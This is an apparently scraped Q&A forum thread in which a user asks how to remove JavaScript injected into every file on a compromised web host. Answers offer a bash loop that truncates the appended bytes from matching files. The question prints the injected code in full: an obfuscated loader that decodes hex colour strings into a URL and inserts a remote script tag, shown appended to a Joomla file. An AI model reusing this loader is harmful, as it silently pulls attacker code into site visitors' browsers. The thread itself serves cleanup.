Need to remove multiple unique lines from multiple files

Here is the back story. I have a friend whos host got hosed by a cross site scripting attack.

The following script at the bottom has been added to the bottom of all files. Does anyone have an awk or sed command to remove this? (there may be other javascript in files)

Appears script has been added to all files on host. HTML PHP JS.

Some files have php starting on a n开发者_运维知识库ew line some not. I need to find that script portion any where in a file and remove it.

<?php
/**
 * @version     $Id: COPYRIGHT.php 14401 2010-01-26 14:10:00Z louis $
 * @package     Joomla
 * @copyright   Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
 * @license     GNU/GPL, see LICENSE.php
 * Joomla! is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 */

defined('_JEXEC') or die('Restricted access');
?>

Joomla! derives from copyrighted works licensed under the GNU General
Public License.  This version has been modified pursuant to the
GNU General Public License as of September 15, 2005, and as distributed,
it includes or is derivative of works licensed under the GNU General
Public License or other free or open source software licenses.  Please
see the CREDITS.php for a non-exhaustive list of contributors and
copyright holders.  A full text version of the GNU GPL version 2 can be
found in the LICENSE.php file.  A full text version of the other licenses
that Joomla! is derivative of or includes can be found in LICENSES.php.<script>

function vdch() {

    if(document.all.length > 3) {

        var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');

        var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }

        var dch = document.createElement("script");

        dch.id = "dchid";

        dch.src = dchid;

        document.all[3].appendChild(dch);

    } else {

        setTimeout("vdch()",500);

    }

} setTimeout("vdch()",500);

</script>

• Count number of the appended characters (with wc -c on a file contatining only the appended script). In my example len=1807.
• Choose a uniq string which will identify file with appended script (In my example pat="new Array('#6a7072', '#723e29', '#2d7371'").
• Make backup of affected directory.

Run following script in that directory:

#!/bin/bash
pat="new Array('#6a7072', '#723e29', '#2d7371'"
len=1807                                 
TMP=$(mktemp)                                                                   
find . -type f | while read f                                                   
do                                                                              
  if grep "$pat" "$f" >/dev/null                                                
  then                                                                          
    head -c -$len "$f" > $TMP                                                   
    cat $TMP > "$f"                                                             
  fi                                                                            
done

The script will remove specified number of characters from the end of each file in which pattern was found.

head -n -50 yourFile

50 lines to remove at the end